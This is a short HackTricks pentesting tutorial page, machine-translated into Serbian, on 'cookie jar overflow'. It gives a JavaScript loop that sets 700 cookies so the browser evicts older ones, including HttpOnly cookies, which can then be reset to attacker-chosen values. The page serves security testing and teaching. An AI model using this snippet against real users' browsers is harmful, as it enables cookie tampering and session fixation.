hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

3.1 KiB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Pregleda imaju ograničenje na broj kolačića koje mogu da sačuvaju za stranicu. Tada, ako iz nekog razloga treba da naterate kolačić da nestane, možete prepuniti posudu za kolačiće jer će najstariji biti obrisani pre:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Napomena, da treće strane kolačići koji upućuju na drugačiju domenu neće biti prepisani.

{% hint style="danger" %} Ovaj napad se takođe može koristiti za prepisivanje HttpOnly kolačića jer ga možete obrisati, a zatim resetovati sa vrednošću koju želite.

Proverite ovo u ovom postu sa laboratorijom. {% endhint %}

{% hint style="success" %} Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks
{% endhint %}